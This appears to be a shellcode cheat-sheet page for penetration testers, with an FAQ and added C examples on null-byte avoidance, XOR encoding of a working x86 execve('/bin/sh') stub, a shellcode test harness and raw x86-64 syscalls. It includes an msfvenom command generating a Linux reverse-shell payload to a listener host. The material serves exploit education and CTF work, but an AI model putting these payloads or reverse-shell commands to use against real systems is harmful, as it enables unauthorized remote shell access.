
Shellcode Reference

Free reference guide: Shellcode Reference

About Shellcode Reference

The Shellcode Reference is a searchable cheat sheet for security researchers and penetration testers covering Linux shellcode development across six categories: x86 (xor eax, push/pop, int 0x80, cdq), x64 (syscall instruction, RIP-relative addressing, register conventions), Encoding (XOR encoder, msfvenom shikata_ga_nai, Base64 loader), Null-Free techniques (JMP-CALL-POP, stack-based strings), Syscalls (execve, socket, dup2, write), and Linux tools (gcc, nasm, objdump, test harness).

Each entry shows the assembly syntax, a description of its purpose in shellcode development, and working code examples. The x86 section demonstrates null-byte avoidance using xor register clearing and lower-byte mov operations. The x64 section covers the syscall instruction with the rax/rdi/rsi/rdx register convention for Linux 64-bit system calls.

This reference is intended for authorized security testing, CTF competitions, exploit development education, and binary analysis research. All content is rendered locally in your browser. No code is executed on any server, and no network requests are made after the initial page load.

Key Features

  • x86 shellcode fundamentals: xor register clearing, push/pop stack manipulation, int 0x80 syscall, cdq sign extension
  • x64 shellcode: syscall instruction, RIP-relative addressing, complete execve /bin/sh shellcode, and register conventions
  • Encoding techniques: XOR encoder with decoder stub, msfvenom shikata_ga_nai, custom Python XOR encoder, Base64 shellcode loader
  • Null-free methods: JMP-CALL-POP string reference, stack-based string construction, lower-byte mov for null avoidance
  • Linux syscall reference: execve (11), socket (359), dup2 (63), write (4) with full assembly examples
  • Development tools: gcc -z execstack compilation, NASM elf32 assembly, objdump disassembly, C test harness template
  • msfvenom payload generation with bad character filtering (-b "\x00") and output format options
  • Searchable across all 6 categories with syntax highlighting and dark mode support

Frequently Asked Questions

Why do shellcodes avoid null bytes?

Null bytes (0x00) terminate C strings. When a payload travels through strcpy(), sprintf() or any other string-copy path, copying stops at the first 0x00 and the rest of the shellcode never arrives. Common fixes: clear registers with "xor eax, eax" instead of "mov eax, 0" (whose encoding, b8 00 00 00 00, contains four nulls); write only the low byte, "mov al, 0x0b", after the register has already been zeroed, instead of "mov eax, 0x0b"; and build strings on the stack with push instructions rather than referencing them at a fixed address. Which bytes count as "bad" depends on the input path: 0x0a, 0x0d, 0x20 and 0xff are also commonly forbidden, so check the final bytes against the full bad-character list for the target, not just against 0x00.

What is the JMP-CALL-POP technique?

JMP-CALL-POP is a position-independent way to obtain the address of data embedded in the shellcode (such as a "/bin/sh" string) without hardcoding an absolute address. The shellcode starts with a short JMP forward to a CALL instruction placed immediately before the data. That CALL jumps backward to the main body and, as a side effect, pushes its return address onto the stack; the return address is the first byte after the CALL, which is the string. The body then POPs that address into a register and passes it to the syscall. The detour exists because CALL has no short form: a forward CALL over a few bytes would encode its 32-bit displacement with null bytes, whereas the backward CALL has a negative displacement (e8 xx ff ff ff) and stays null-free.

What is the difference between x86 and x64 shellcode?

x86 (32-bit) shellcode enters the kernel with int 0x80, with the syscall number in eax and arguments in ebx, ecx, edx, esi, edi and ebp. x64 shellcode uses the syscall instruction, with the number in rax and arguments in rdi, rsi, rdx, r10, r8 and r9 (r10, not rcx, carries the fourth argument, because syscall itself overwrites rcx and r11). In both cases the result comes back in eax/rax, either the return value or a negative errno. x64 also has RIP-relative addressing ("lea rdi, [rel msg]") for position-independent data access, and the syscall numbers differ (execve is 11 on x86 and 59 on x64). A 64-bit process on an x86-64 kernel can still execute int 0x80, but it then hits the 32-bit table with 32-bit arguments, so mixing the two conventions is a common source of confusing failures.

How does XOR encoding work for shellcode?

XOR encoding is an obfuscation, not encryption: each shellcode byte is XORed with a key (for example 0xAA) so that the stored bytes avoid the bad characters, and a small decoder stub prepended to the payload loops over the encoded bytes at runtime and XORs each one back to its original value. The key has three constraints: it must not itself be a bad character (it appears inside the decoder), no shellcode byte may be equal to it (that byte would encode to 0x00), and no encoded byte may land on another bad character. If no single byte satisfies all three, use a multi-byte key or a different transform. The decoder stub has to be written without bad characters too, and anyone who reads the stub recovers the payload immediately, so this defeats byte filters, not analysis.
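The following is an added example, not code from the Shellcode Reference itself. It implements the key-selection rule just described: scan every candidate single-byte key, reject those that are bad characters or that would produce a bad character anywhere in the encoded payload, then encode and round-trip the result. SAMPLE_SC is a constructed, null-free 24-byte x86 execve("/bin/sh") stub (xor eax,eax; cdq; push eax; push "//sh"; push "/bin"; mov ebx,esp; push eax; push ebx; mov ecx,esp; mov al,0x0b; int 0x80) used as sample input; the bad-character set is likewise an assumption for the demonstration.

```c
/* Added example (not from the Shellcode Reference): single-byte XOR encoder
 * with bad-character-aware key selection and a round-trip check.
 * SAMPLE_SC is a constructed, null-free x86 execve("/bin/sh") stub. */
#include <stdio.h>
#include <string.h>

static const unsigned char SAMPLE_SC[] = {
    0x31, 0xc0,                         /* xor eax, eax            */
    0x99,                               /* cdq  (edx = 0 -> envp)  */
    0x50,                               /* push eax (NUL terminator)*/
    0x68, 0x2f, 0x2f, 0x73, 0x68,       /* push "//sh"             */
    0x68, 0x2f, 0x62, 0x69, 0x6e,       /* push "/bin"             */
    0x89, 0xe3,                         /* mov ebx, esp (filename) */
    0x50, 0x53,                         /* push eax; push ebx      */
    0x89, 0xe1,                         /* mov ecx, esp (argv)     */
    0xb0, 0x0b,                         /* mov al, 0x0b (execve)   */
    0xcd, 0x80                          /* int 0x80                */
};
#define SAMPLE_SC_LEN (sizeof SAMPLE_SC)

/* Is byte b in the bad-character set? */
static int is_bad(unsigned char b, const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < nbad; i++)
        if (bad[i] == b) return 1;
    return 0;
}

/* Number of bytes in buf that fall in the bad set (0 means clean). */
size_t count_bad(const unsigned char *buf, size_t len,
                 const unsigned char *bad, size_t nbad)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (is_bad(buf[i], bad, nbad)) n++;
    return n;
}

/* Lowest single-byte key such that the key itself and every encoded byte
 * avoid the bad set. A payload byte equal to the key encodes to 0x00, so it
 * is rejected automatically whenever 0x00 is in the bad set.
 * Returns the key, or -1 if no single byte works (use a longer key then). */
int pick_xor_key(const unsigned char *sc, size_t len,
                 const unsigned char *bad, size_t nbad)
{
    for (int key = 1; key < 256; key++) {
        if (is_bad((unsigned char)key, bad, nbad)) continue;
        size_t i;
        for (i = 0; i < len; i++)
            if (is_bad((unsigned char)(sc[i] ^ key), bad, nbad)) break;
        if (i == len) return key;
    }
    return -1;
}

/* XOR every byte with key. The same loop encodes and decodes; a decoder
 * stub prepended to the payload performs exactly this at runtime. */
void xor_buf(unsigned char *buf, size_t len, unsigned char key)
{
    for (size_t i = 0; i < len; i++) buf[i] ^= key;
}

/* Encode sc into out (same length). Returns the key used, or -1. */
int xor_encode(const unsigned char *sc, size_t len,
               const unsigned char *bad, size_t nbad, unsigned char *out)
{
    int key = pick_xor_key(sc, len, bad, nbad);
    if (key < 0) return -1;
    memcpy(out, sc, len);
    xor_buf(out, len, (unsigned char)key);
    return key;
}

int main(void)
{
    /* Assumed bad-character list for the demonstration: NUL, LF, CR, space */
    const unsigned char bad[] = { 0x00, 0x0a, 0x0d, 0x20 };
    unsigned char enc[SAMPLE_SC_LEN];
    int key = xor_encode(SAMPLE_SC, SAMPLE_SC_LEN, bad, sizeof bad, enc);
    if (key < 0) { puts("no single-byte key avoids the bad set"); return 1; }
    printf("key = 0x%02x, bad bytes after encoding = %zu\n", key,
           count_bad(enc, SAMPLE_SC_LEN, bad, sizeof bad));
    printf("unsigned char encoded[] = \"");
    for (size_t i = 0; i < SAMPLE_SC_LEN; i++) printf("\\x%02x", enc[i]);
    puts("\";");
    return 0;
}
```

With only 0x00 forbidden, key 0x01 is accepted because no payload byte equals 0x01. Adding 0x0a to the list rejects 0x01, since the "mov al, 0x0b" immediate would encode to 0x0a, and the search moves on to 0x02. This is the check msfvenom's -b option performs for you; doing it by hand shows why a "random" key sometimes yields a payload that still fails.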

How do I compile and test shellcode on Linux?

Write the assembly in NASM syntax, assemble with "nasm -f elf32 shellcode.asm -o shellcode.o" and link with "ld -m elf_i386 shellcode.o -o shellcode" to get a standalone binary for a first run. Inspect the encoding with "objdump -d shellcode.o" and look for 0x00 (or any other bad character) in the opcode column; "objcopy -O binary -j .text shellcode.o shellcode.bin" dumps the raw bytes. To test inside a C harness, embed the bytes as a string (unsigned char code[] = "...") and call the array as a function. The traditional build line "gcc -z execstack -fno-stack-protector -o test test.c" relies on that array living in an executable segment; on x86-64 Linux kernels from 5.8 onward -z execstack makes only the stack executable, not the data segment, so a harness that copies the bytes into an mmap()'d region and marks it executable with mprotect() is the more reliable choice. 32-bit shellcode must run in a 32-bit process (gcc -m32, which needs the multilib packages installed).
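Here is an added harness in that style; it is not the Shellcode Reference's own template. Instead of depending on -z execstack it maps a fresh anonymous region read/write, copies the bytes in, flips the mapping to read/execute (so the page is never writable and executable at once), and calls it as a function returning whatever the code leaves in rax. SAMPLE_RET42 is a constructed, null-free 5-byte x86-64 stub (xor eax,eax; mov al,42; ret) chosen so the harness has a checkable return value rather than spawning a shell; RUN_SHELLCODE_NOMEM is this example's own sentinel for a refused mapping.

```c
/* Added example (not the page's own harness): run shellcode from a W^X
 * anonymous mapping instead of relying on -z execstack. */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define RUN_SHELLCODE_NOMEM (-1L)   /* mmap or mprotect refused (example sentinel) */

/* Constructed, null-free x86-64 stub: xor eax,eax ; mov al,42 ; ret */
static const unsigned char SAMPLE_RET42[] = { 0x31, 0xc0, 0xb0, 0x2a, 0xc3 };

/* Count 0x00 bytes, the minimum check before a payload goes through a
 * string-copy style delivery path. */
size_t count_nulls(const unsigned char *code, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00) n++;
    return n;
}

/* Copy code into a page-aligned RW mapping, switch it to RX, call it as
 * `long fn(void)` and return rax. Returns RUN_SHELLCODE_NOMEM when the
 * system refuses an executable anonymous mapping. */
long run_shellcode(const unsigned char *code, size_t len)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t maplen = ((len + page - 1) / page) * page;

    void *mem = mmap(NULL, maplen, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return RUN_SHELLCODE_NOMEM;
    memcpy(mem, code, len);

    /* W^X: drop write before granting execute. */
    if (mprotect(mem, maplen, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, maplen);
        return RUN_SHELLCODE_NOMEM;
    }

    long (*fn)(void);
    memcpy(&fn, &mem, sizeof fn);   /* object -> function pointer, warning-free */
    long result = fn();
    munmap(mem, maplen);
    return result;
}

int main(void)
{
    printf("%zu null bytes in a %zu-byte payload\n",
           count_nulls(SAMPLE_RET42, sizeof SAMPLE_RET42), sizeof SAMPLE_RET42);
#if defined(__x86_64__)
    long r = run_shellcode(SAMPLE_RET42, sizeof SAMPLE_RET42);
    if (r == RUN_SHELLCODE_NOMEM) {
        puts("could not create an executable mapping");
        return 1;
    }
    printf("shellcode returned %ld\n", r);
#else
    puts("SAMPLE_RET42 is x86-64 code; not executing on this architecture");
#endif
    return 0;
}
```

Swap in your own bytes once they pass count_nulls(); an execve payload will of course replace the harness process with /bin/sh instead of returning. If mprotect() fails with EACCES, a mandatory access control policy (for example an SELinux execmem denial) is refusing executable anonymous memory, which is worth knowing about before blaming the shellcode.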

What syscalls are commonly used in Linux shellcode?

The most common are execve (x86: 11, x64: 59) to spawn a shell, socket (x86: 359, or 102 via the socketcall multiplexer; x64: 41) to create a network connection, dup2 (x86: 63, x64: 33) to point stdin, stdout and stderr at the socket for a reverse shell, write (x86: 4, x64: 1) for output and read (x86: 3, x64: 0) for input. Bind shells additionally use bind, listen and accept. On x86 the direct socket, connect, bind, listen and accept numbers only exist from kernel 4.3 onward; before that every socket operation went through socketcall (102) with the sub-call number in ebx and a pointer to the argument array in ecx, which is why older x86 shellcode and many tutorials still use that form.
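To make the x64 convention from the earlier x86-versus-x64 answer and the numbers above concrete, here is an added example, not code from the Shellcode Reference: a raw x86-64 Linux syscall wrapper written with inline assembly, plus thin wrappers for getpid, write and dup2. The X64_SYS_* names are this example's own constants holding the x86-64 numbers listed above; on any other architecture the wrapper returns -ENOSYS rather than pretending the convention applies.

```c
/* Added example (not from the Shellcode Reference): the x86-64 syscall
 * convention in C. rax = number; args in rdi, rsi, rdx, r10, r8, r9;
 * result in rax (negative errno on failure); rcx and r11 are clobbered. */
#define _GNU_SOURCE
#include <errno.h>
#include <stddef.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* x86-64 numbers of the syscalls discussed on this page (example constants) */
enum {
    X64_SYS_READ   = 0,
    X64_SYS_WRITE  = 1,
    X64_SYS_DUP2   = 33,
    X64_SYS_GETPID = 39,
    X64_SYS_SOCKET = 41,
    X64_SYS_EXECVE = 59
};

/* Issue `syscall` directly. Returns rax unchanged, so errors arrive as
 * -errno; libc is what normally converts that into errno and -1. */
long raw_syscall6(long nr, long a1, long a2, long a3, long a4, long a5, long a6)
{
#if defined(__linux__) && defined(__x86_64__)
    long ret;
    register long r10 __asm__("r10") = a4;   /* 4th argument: r10, not rcx */
    register long r8  __asm__("r8")  = a5;
    register long r9  __asm__("r9")  = a6;
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "a"(nr), "D"(a1), "S"(a2), "d"(a3),
                        "r"(r10), "r"(r8), "r"(r9)
                      : "rcx", "r11", "memory");   /* clobbered by the instruction */
    return ret;
#else
    (void)nr; (void)a1; (void)a2; (void)a3; (void)a4; (void)a5; (void)a6;
    return -ENOSYS;   /* not x86-64 Linux: this convention does not apply */
#endif
}

long raw_getpid(void)
{
    return raw_syscall6(X64_SYS_GETPID, 0, 0, 0, 0, 0, 0);
}

/* write(fd, buf, len): rax=1, rdi=fd, rsi=buf, rdx=len */
long raw_write(int fd, const void *buf, size_t len)
{
    return raw_syscall6(X64_SYS_WRITE, fd, (long)buf, (long)len, 0, 0, 0);
}

/* dup2(oldfd, newfd): rax=33, rdi=oldfd, rsi=newfd; returns newfd */
long raw_dup2(int oldfd, int newfd)
{
    return raw_syscall6(X64_SYS_DUP2, oldfd, newfd, 0, 0, 0, 0);
}

int main(void)
{
    static const char msg[] = "hello from a raw syscall\n";
    raw_write(1, msg, sizeof msg - 1);
    return raw_getpid() == (long)getpid() ? 0 : 1;
}
```

The "rcx" and "r11" clobbers are the detail most often missed when moving from int 0x80 to syscall: a value parked in rcx across the instruction is silently lost. Comparing the constants against the SYS_* macros from sys/syscall.h is a cheap way to catch a wrong number before it turns into an unexplained crash.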

How do I generate shellcode with msfvenom?

Pick the payload, the listener address and the output format, for example: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f c -b '\x00'. The -b flag lists bad characters and makes msfvenom choose an encoder that avoids them; -e selects an encoder explicitly (e.g. x86/shikata_ga_nai) and -i sets the number of encoding iterations; -f selects the output format (c, python, raw, elf and others; "msfvenom -l formats" lists them, "msfvenom -l encoders" the encoders). Check the final output against your bad-character list before using it, and remember that more iterations change the bytes but do not make the payload harder to analyse once the decoder stub is read.

Is this shellcode reference intended for malicious use?

No. This reference is designed for authorized security testing, CTF competitions, academic exploit development courses, and binary analysis research. All techniques documented here are publicly available in security textbooks and training materials. Users are responsible for ensuring they have proper authorization before testing any exploit code on systems they do not own.